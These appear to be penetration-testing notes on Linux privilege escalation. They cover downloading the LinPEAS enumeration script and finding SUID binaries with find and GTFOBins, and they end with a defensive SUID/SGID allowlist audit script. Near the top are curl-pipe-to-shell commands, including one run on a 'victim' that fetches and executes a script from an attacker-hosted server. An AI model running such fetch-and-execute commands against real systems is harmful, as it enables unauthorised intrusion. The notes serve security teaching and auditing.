LinPEAS
Latest Releases: Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub
# From GitHub
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
Privilege Escalation: SUID
Finding SUID Binaries
Use the command "find / -perm -u=s -type f 2>/dev/null" to search the file system for files with the SUID bit set. Let's break down this command.
find – Invokes the "find" command
/ – Searches the whole file system
-perm – Searches for files with specific permissions
-u=s – Matches files whose setuid bit (u=s) is set; the leading "-" means all of the listed permission bits must be set. Symbolic modes are accepted in this form
-type f – Only search for regular files
2>/dev/null – Suppresses errors by discarding standard error (for example, "Permission denied" messages)
find / -type f -perm -04000 -ls 2>/dev/null
A good practice would be to compare executables on this list with GTFOBins (https://gtfobins.github.io). Clicking on the SUID button will filter binaries known to be exploitable when the SUID bit is set (you can also use this link for a pre-filtered list https://gtfobins.github.io/#+suid).
The list above shows that nano has the SUID bit set. Unfortunately, GTFOBins does not provide us with an easy win. As is typical of real-life privilege escalation scenarios, we will need to find intermediate steps that help us leverage whatever minuscule finding we have.
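The same find query can be run from the defender's side to catch a stray SUID bit such as the one on nano. The following is an added example, not part of the original notes: it extends the search to SGID files and reports only those missing from an allowlist. The function names, the allowlist format (one absolute path per line) and the demo tree are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original page): report set-ID files under ROOT
# that are missing from an allowlist of expected paths.
# Usage: audit_setid ROOT ALLOWLIST
#   ALLOWLIST: one absolute path per line (format assumed for this example)
audit_setid() {
    root=$1
    allow=$2
    # Same idea as the find commands above, extended to SGID (-perm -2000).
    find "$root" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    sort |
    while IFS= read -r path; do
        # -x whole line, -F fixed string: paths are never treated as regexes.
        if grep -qxF -- "$path" "$allow" 2>/dev/null; then
            continue
        fi
        if [ -u "$path" ]; then kind=SUID; else kind=SGID; fi
        printf '%s %s\n' "$kind" "$path"
    done
}

# Constructed demo tree: passwd is expected to be SUID, nano is not.
demo_audit() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/usr/bin"
    for f in passwd nano ls; do : > "$tmp/usr/bin/$f"; done
    chmod 4755 "$tmp/usr/bin/passwd" "$tmp/usr/bin/nano"
    chmod 0755 "$tmp/usr/bin/ls"
    printf '%s\n' "$tmp/usr/bin/passwd" > "$tmp/allow.txt"
    # Strip the temporary prefix so the output reads like real system paths.
    audit_setid "$tmp/usr" "$tmp/allow.txt" | sed "s|$tmp||"
    rm -rf "$tmp"
}

demo_audit   # prints: SUID /usr/bin/nano
```

On a real host, build the allowlist from a known-good install of the same distribution and run the audit with / as ROOT on a schedule, so that a newly added set-ID file shows up as a one-line difference.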